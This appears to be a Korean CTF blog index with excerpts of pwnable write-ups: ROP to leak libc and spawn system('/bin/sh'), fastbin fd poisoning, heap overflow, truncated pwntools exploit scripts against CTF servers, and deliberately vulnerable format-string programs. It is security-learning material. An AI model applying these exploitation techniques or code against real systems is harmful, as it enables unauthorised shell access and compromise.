System

바이너리 자체는 reversing 250점 문제와 똑같다. 키를 맞추고 나면 memcpy함수가 실행된다. 입력값의 1~100번째 값은 키를 맞추는데 사용됬고, 101번째 부터는 ebp-20h 에 복사가 된다. 따라서 입력한 값 100 + 0x20 + 8 = 140번째에 넣는 값은 rbp+8, 즉 리턴되는 주소이다. system('/bin/sh')를 사용하기 위해서는 실제주소를 알아야하기 때문에 릭하는 과정이 필요하다. 나는 rop페이로드를 짜서 printf의 주소를 알아낸 후, libc의 오프셋주소를 이용해서 실제 system주소와 /bin/sh 문자열 주소를 알아냈다. 그리고 두번째 실행할 때, system('/bin/sh')가 실행되도록 페이로드를 구성한 후 보냈고 쉘이 따졌다.aslr이 꺼져있다고 ..

문제파일에는 elf헤더의 5번째 byte가 2로 되있다.32bit 바이너리인데 2로 되있기 때문에 1로 수정을 하고 분석을 했다.문제환경이 14.04.5라고 명시되어있었다.따라서 14.04.5의 libc를 sig파일로 저장해서 ida에 적용시켜서 보았다. main함수에 입력을 받는 문자열이 있지만 실제로는 fake이다.init_array에서 두번째로 실행되는 함수안을 들여다보면 sleep을 걸고 chroot, 권한, 접근가능한지 확인을 한다.그리고 그 바로밑에 real_input이라고 내가 바꿔논 함수안에서 실질적인 입력을 받는다. ida에서 c를 누르면 분석하지 못했던 것들이 분석되서 위와 같은 코드가 나온다.여기서 입력을 받는데 최대길이가 89이다.그리고 아래쪽으로 단어조건이 5개가 있다. 그 단어조..

힙 청크를 이용한 문제였다. 32bit에 대해서 문서만 봐서 64bit는 뭐 어떻게 해야할지 몰랐는데 하고 나서보니 비슷했다. 크게 add, free, modify 함수가 있고, 코드자체는 비교적 간단해서 말로 설명을 하자면 최대 32byte까지 malloc을 5번 할 수 있고, 또한 원하는 힙을 free 시킬 수 있다. 여기서 modify함수가 중요한데 한번 malloc 된 힙주소를 32byte까지 수정할 수 있다. malloc되는 heap의 크기가 작기 때문에 fastbin으로 관리가 된다. 이 문제에서는 free를 하고 난 이후, modify를 통해 다음 malloc이 발생할 때 fastbin에 들어가는 fd를 내가 원하는 주소로 수정할 수 있따. 이글에 쓰어진 공격은 malloc -> free -..

먼저 보호기법을 살펴보면 비교적 간단하게 되어있다. 함수의 프롤로그 부분 함수의 에필로그 부분 그런데 정적분석을 하다보면 함수마다 프롤로그 에필로그 부분에 같은 코드가 계속 반복되어 있는 것을 확인 할 수 있다. 연결리스트로 연결되어 있는듯한 모습을 하고 있는데, 대략 이런식으로 연결리스트가 구성된다고 생각하면 된다. 에필로그 부분에서는 프롤로그 부분에서 힙에 저장한 ret주소가 현재도 같은지 확인을 하고 같으면 이전 함수의 구조체 주소+8에 0xDEADCD80을 다시 저장을 한다. 즉, 이 문제는 보호기법에서 canary가 없는 대신, 힙에 간단한 연결리스트를 만들고 ret값을 저장하여 ret부분이 overwrite됬는지 매 함수마다 확인을 한다고 생각하면 된다. 이 부분은 인텔에서 발표한 CET보호기..

크게 두 개의 함수가 존재한다.한개는 유저 구조체를 init하는 함수이고,한개는 이상한? 게임을 진행하고 기존의 점수보다 높으면 이름을 수정할 수 있는 그런 함수이다. 위 함수에서 이름이 저장되는 heap주소가, user_info 구조체의 힙주소보다 낮은주소에 위치한다는 것을 기억해야한닷코드를 보고 대충의 구조체를 알아낼 수 있따. score는 이상한 게임을 하는 함수를 보면 처음 4바이트에 저장되는것을 알 수 있다. 이상한 게임을 진행하는 함수의 마지막 부분인데, 여기서 취약점이 발생한다.만약 현재 score보다 높은점수를 게임을 통해 획득하면, 이름을 바꿀 수 있게되는데,malloc을 통해 기존의 name의 길이보다 더 큰 크기의 메모리를 할당 받을 수 있다.user_info 자체의 힙영역의 주소는 ..

from pwn import * import stitch local = False if local : s = remote('localhost', 8005) else : s = remote('pwn.chal.csaw.io', 8002) raw_input() def solve() : p.status('leak puts addr') s.recvuntil('>') sleep(1) s.sendline('1') puts = int(s.recvuntil('\n').split(':')[1].strip('0x'), 16) + 1280 libc = stitch.find_libc({'puts':hex(puts)[-3:]})[0] offset = puts - libc['puts'] poprdi = offset + libc['..

이거 대회끝난지 한 2주됬는데 갑자기 생각나서 올린다. 다른팀원들이 미리 풀어논게 있어서 1등이였는데 새벽에 다른팀들이 올라왔다. 나는 대회를 밤늦게 시작해서 팀원들이 풀지 않은 easy 3종 셋트를 풀었다. 2등이라도 유지해서 다행이였다. easy_fsb를 처음에 풀었는데 libc가 주어진질 모르고 조금씩조금씩 libc를 긁어서 모으고 있었다. 그러다가 공지사항을 보니 낮에 libc를 올려놨었다....... 그래서 바로 다시 오프셋을 적어서 풀었다. 그냥 전형적인 fsb문제였다. from pwn import * import stitch s = remote('prob.layer7.kr', 10002) p = log.progress('Exploiting!') if __name__ == '__main__' ..

from pwn import * import stitch local = False if local : s = remote('localhost', 9988) else : s = remote('diapers.asis-ctf.ir', 1343) raw_input() def main() : strip_ = lambda x : x.strip('0x') p = log.progress('start pwning....') p.status('select first') #to stack underflow s.recvuntil('> ') s.sendline('3') for _ in range(257) : p.status('%dth minus'%(_+1)) s.recvuntil('> ') sleep(0.1) s.sendlin..

from pwn import * import stitch local = False if local : s = remote('localhost', 9999) offset = {'read35' : 0xd5c23, 'system' : 0x3ad80, 'binsh' : 0x15ba3f} raw_input('ready!') else : s = remote('chal.cykor.kr', 20003) offset = {'read35' : 0xd4443, 'system' : 0x3a920, 'binsh' : 0x15909f} def reg_login(menu, myid, mypw) : global s s.recvuntil('\n\n') s.sendline(menu) s.recvuntil(' : ') s.sendline..

https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#linux-system-call-tableRandom NamesKernel ImplementationsCalling ConventionsTablesx86_64 (64-bit)arm (32-bit/EABI)arm64 (64-bit)x86 (32-bit)Cross-arch Numbers

FSB예제 32bit //gcc fsb32.c -o fsb32 -m32 -mpreferred-stack-boundary=2 #include #include int main(int argc, char **argv){ char buf[128] = {0, } ; int ret_addr = (int)buf ; for(int i = 0 ; i < 2 ; i++){ fgets(buf, 128, stdin) ; printf(buf) ; memset(buf, 0, 128) ; } return 0 ; } 64bit //gcc fsb64.c -o fsb64 -mpreferred-stack-boundary=4 #include #include int main(int argc, char **argv){ char buf[1024..

Linux System CallsYou can make use of Linux system calls in your assembly programs. You need to take the following steps for using Linux system calls in your program −Put the system call number in the EAX register.Store the arguments to the system call in the registers EBX, ECX, etc.Call the relevant interrupt (80h).The result is usually returned in the EAX register.There are six registers that ..